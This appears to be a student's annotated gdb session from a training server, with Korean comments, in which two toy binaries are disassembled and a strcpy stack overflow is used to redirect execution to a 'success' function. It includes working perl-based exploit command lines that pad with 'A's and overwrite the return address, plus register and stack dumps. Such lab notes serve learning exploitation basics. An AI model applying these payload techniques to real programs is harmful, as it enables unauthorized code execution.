|
|
|
i fun
Non-debugging symbols:
0x08048278 _init
0x080482a0 __libc_start_main
0x080482b0 printf
0x080482c0 exit
0x080482d0 strcpy
0x08048304 call_gmon_start
0x08048328 __do_global_dtors_aux
0x08048364 frame_dummy
0x08048390 success <- 목표함수
0x080483a8 main
0x080483fc __libc_csu_init
0x0804842c __libc_csu_fini
0x08048460 __do_global_ctors_aux
0x08048484 _fini
Dump of assembler code for function success:
0x08048390 <success+0>: push %ebp
0x08048391 <success+1>: mov %esp,%ebp
0x08048393 <success+3>: sub $0x8,%esp
0x08048396 <success+6>: sub $0xc,%esp
0x08048399 <success+9>: push $0x80484a8
0x0804839e <success+14>: call 0x80482b0 <printf>
0x080483a3 <success+19>: add $0x10,%esp
0x080483a6 <success+22>: leave
0x080483a7 <success+23>: ret
End of assembler dump.
Dump of assembler code for function main:
0x080483a8 <main+0>: push %ebp
0x080483a9 <main+1>: mov %esp,%ebp
0x080483ab <main+3>: sub $0x18,%esp <- 24byte ebp 까지 합쳐서 28바이트
0x080483ae <main+6>: and $0xfffffff0,%esp
0x080483b1 <main+9>: mov $0x0,%eax
0x080483b6 <main+14>: sub %eax,%esp
0x080483b8 <main+16>: cmpl $0x1,0x8(%ebp)
0x080483bc <main+20>: jg 0x80483c8 <main+32>
0x080483be <main+22>: sub $0xc,%esp
0x080483c1 <main+25>: push $0x0
0x080483c3 <main+27>: call 0x80482c0 <exit>
0x080483c8 <main+32>: sub $0x8,%esp
0x080483cb <main+35>: mov 0xc(%ebp),%eax
0x080483ce <main+38>: add $0x4,%eax
0x080483d1 <main+41>: pushl (%eax)
0x080483d3 <main+43>: lea 0xffffffe8(%ebp),%eax
0x080483d6 <main+46>: push %eax
0x080483d7 <main+47>: call 0x80482d0 <strcpy>
0x080483dc <main+52>: add $0x10,%esp
0x080483df <main+55>: sub $0x8,%esp
0x080483e2 <main+58>: lea 0xffffffe8(%ebp),%eax
0x080483e5 <main+61>: push %eax
0x080483e6 <main+62>: push $0x80484bb
0x080483eb <main+67>: call 0x80482b0 <printf>
0x080483f0 <main+72>: add $0x10,%esp
0x080483f3 <main+75>: mov $0x0,%eax
0x080483f8 <main+80>: leave
0x080483f9 <main+81>: ret
0x080483fa <main+82>: nop
0x080483fb <main+83>: nop
End of assembler dump.
0x08048390 <- success 의 메모리주소
메모리 주소를 2개로 묶어서
거꾸로 한다
08 04 83 90
90 83 04 08
./base `perl -e 'print "A"x28, "\x90\x83\x04\x08"
mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
Base3 파일을 이용한 언더플로우
(gdb)
i fun
All defined functions:
Non-debugging symbols:
0x08048278 _init
0x080482a0 __libc_start_main
0x080482b0 printf
0x080482c0 exit
0x080482d0 strcpy
0x08048304 call_gmon_start
0x08048328 __do_global_dtors_aux
0x08048364 frame_dummy
0x08048390 success <- 공격타겟
0x080483a8 main
0x08048420 __libc_csu_init
0x08048450 __libc_csu_fini
0x08048484 __do_global_ctors_aux
0x080484a8 _fini
(gdb)
(gdb)
disass main
Dump of assembler code for function main:
0x080483a8 <main+0>: push %ebp
0x080483a9 <main+1>: mov %esp,%ebp
0x080483ab <main+3>: sub $0x368,%esp
0x080483b1 <main+9>: and $0xfffffff0,%esp
0x080483b4 <main+12>: mov $0x0,%eax
0x080483b9 <main+17>: sub %eax,%esp
0x080483bb <main+19>: sub $0xc,%esp
0x080483be <main+22>: push $0x80484dc
0x080483c3 <main+27>: call 0x80482b0 <printf>
0x080483c8 <main+32>: add $0x10,%esp
0x080483cb <main+35>: cmpl $0x1,0x8(%ebp)
0x080483cf <main+39>: jg 0x80483eb <main+67>
0x080483d1 <main+41>: sub $0xc,%esp
0x080483d4 <main+44>: push $0x80484e1
0x080483d9 <main+49>: call 0x80482b0 <printf>
0x080483de <main+54>: add $0x10,%esp
0x080483e1 <main+57>: sub $0xc,%esp
0x080483e4 <main+60>: push $0x0
0x080483e6 <main+62>: call 0x80482c0 <exit>
0x080483eb <main+67>: sub $0x8,%esp
0x080483ee <main+70>: mov 0xc(%ebp),%eax
0x080483f1 <main+73>: add $0x4,%eax
0x080483f4 <main+76>: pushl (%eax)
0x080483f6 <main+78>: lea 0xfffffea8(%ebp),%eax
0x080483fc <main+84>: push %eax <-break
0x080483fd <main+85>: call 0x80482d0 <strcpy>
0x08048402 <main+90>: add $0x10,%esp <-break
0x08048405 <main+93>: sub $0x8,%esp
0x08048408 <main+96>: lea 0xffffff78(%ebp),%eax
0x0804840e <main+102>: push %eax
0x0804840f <main+103>: push $0x80484ee
0x08048414 <main+108>: call 0x80482b0 <printf>
0x08048419 <main+113>: add $0x10,%esp
0x0804841c <main+116>: leave
0x0804841d <main+117>: ret
0x0804841e <main+118>: nop
0x0804841f <main+119>: nop
End of assembler dump.
break 걸고 실행 시...
(gdb) run AAAAAAAAAA
Starting program: /home/s27/sperue/base3 AAAAAAAAAA
hi~
Breakpoint 1, 0x080483fc in main ()
(gdb) info reg
eax 0xbffff3a0 -1073744992
ecx 0x4212ee20 1108536864
edx 0x4 4
ebx 0x42130a14 1108544020
esp 0xbffff184 0xbffff184
ebp 0xbffff4f8 0xbffff4f8
esi 0x40015360 1073828704
edi 0x8048450 AA34513744
eip 0x80483fc 0x80483fc
eflags 0x286 646
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x33 51
(gdb)
break1 ...
(gdb)
x/12
0x080483fc
0x80483fc <main+84>: 0xfecee850 0xc483ffff 0x08ec8310 0xff78858d
0x804840c <main+100>: 0x6850ffff 0x080484ee 0xfffe97e8 0x10c483ff
0x804841c <main+116>: 0x9090c3c9 0x56e58955 0xfe4ee853 0xf8b8ffff
(gdb)
Breakpoint 1, 0x080483fc in main ()
(gdb) x/12 $esp
0xbfffda04: 0xbffffbea 0x0804959c 0x40015a38 0x00000000
0xbfffda14: 0x400169e0 0xecef4f04 0x0003007a 0x00000000
0xbfffda24: 0x01000000 0x00000000 0x00000000 0x00000000
(gdb)
Breakpoint 2, 0x08048402 in main ()
(gdb) x/12
0x08048402
0x8048402 <main+90>: 0x8310c483 0x858d08ec 0xffffff78 0x84ee6850
0x8048412 <main+106>: 0x97e80804 0x83fffffe 0xc3c910c4 0x89559090
0x8048422 <__libc_csu_init+2>: 0xe85356e5 0xfffffe4e 0x0494f8b8
0x94f82d08
(gdb)
Breakpoint 2, 0x08048402 in main ()
(gdb) x/13 $esp
0xbfffda00: 0xbfffdc20 0xbffffbea 0x0804959c 0x40015a38
0xbfffda10: 0x00000000 0x400169e0 0xecef4f04 0x0003007a
0xbfffda20: 0x00000000 0x01000000 0x00000000 0x00000000
0xbfffda30: 0x00000000
(gdb)
0x08048390
90830408
ebp 값 - A 시작된 메모리 주소 = 값
0xbfffeb10
(gdb)
0xbfffeb00: 0xbfffeb40 0x4000914d 0x42010c7f 0x08048216
0xbfffeb10: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffeb20: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0xbfffeb30: 0x40004141 0x4001582c 0x40015bd4 0x080481f5
0xbfffeb40: 0xbfffec20 0x40008156 0x080481f5 0x0177ff8e
0xbfffeb50: 0x08048168 0xbfffebd0 0x40015b88 0x00000001
(gdb)
i functions $ebp
All functions matching regular expression "$ebp":
(gdb) i reg $ebp
ebp 0xbfffec68 0xbfffec68
(gdb)
[s27@TRAININGSERVER sperue]$ ./base3 `perl -e 'print "A"x348, "\x90\x83\x04\x08"'`
hi~
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
릡
You're Best!!!
세그멘테이션 오류
[s27@TRAININGSERVER sperue]$